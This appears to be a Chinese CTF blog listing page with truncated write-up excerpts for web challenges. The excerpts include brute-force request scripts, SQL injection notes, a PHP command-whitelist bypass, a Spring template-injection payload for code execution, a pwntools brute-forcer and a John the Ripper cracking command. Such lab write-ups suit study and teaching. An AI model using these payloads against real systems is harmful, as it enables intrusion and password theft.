sql
sql 预处理
css game
import requestsimport timesession = requests.session()while 1:burp0_url = "http://node4.anna.nssctf.cn:28872/crawl.html"burp0_cookies = {"UM_distinctid": "176929086fa3a0-0b0ed985080c69-163b6153-13c680-176929086fb472", "_ga": "GA1.2.602800589.1608776974", "_gid": "GA1.2.1740085603.1609750409"}burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade- ...
不是文件上传
根据源码的提示找到github上的源代码 源码 然后思路是想看到sql语句,其中应该可以插入危险代码,导致sql注入。那么我们先找到SQL语句: INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).") 追溯函数: implode(",",$sql_fields: 用逗号组合sql_fields $sql_fields[] = "“.$key_temp.”"; 反引号中间包含str_replace(chr(0).‘*’.chr(0), ‘\0\0\0’, $key); $key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key); 替换后的key 4.foreach($data as $key=>$value) data的键数组 看看pop链: insert_array-&g ...
Web-Bash-Vino0o0o
<?phphighlight_file(__FILE__);if(isset($_POST["cmd"])){ $test = $_POST['cmd']; $white_list = str_split('${#}\\(<)\'0'); $char_list = str_split($test); foreach($char_list as $c){ if(!in_array($c,$white_list)){ die("Cyzcc"); } } exec($test);}?> 只能使用括号内的字符执行命令 import requests# 八进制n = dict()n[0] = '${#}'n[1] = '${##}&# ...
logic
cookie 解密 非预期 万能密码
异或
文件上传
传解析文件 传图片
happygame
grpc java反序列化,随便注 反弹shell拿flag
thinkphp
该退役了 唉,不知道
Spring
https://tttang.com/archive/1692/ 为什么我ban的是%??? 你妈的,不打了,退游 {% set y= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %}{% set yy = beans.get("jacksonObjectMapper").readValue("{}", y) %}//把下面这个类分成a+b,org.springframework.context.support.ClassPathXmlApplicationContext {% set a = "org.springframework.context.support"%&# ...
石头剪刀布
爆破 from pwn import *def make_guess(ip, port, guess_sequence): conn = remote(ip, port) # 根据猜测序列进行出拳 for guess in guess_sequence: conn.recvuntil('请出拳(0 - 石头,1 - 剪刀,2 - 布):') conn.sendline(guess) # 读取服务器的响应 response = conn.recv() conn.close() return response.decode()ip = '8.147.129.191'port = 15691# 初始猜测序列guess_sequence = ['0', '0', '0', '0', '0']# 在每个位置上最多尝试3次for i in range(5, 100): # 假设最多猜测10 ...
John
John the Ripper 先判断hash类型,在那个hash网站的另一个路由 然后 john --wordlist=/usr/share/wordlists/rockyou.txt hash4.txt --format=whirlpool 写了一半,不好玩
avatar
dionysus
我醉欲眠卿且去
此心安处
公告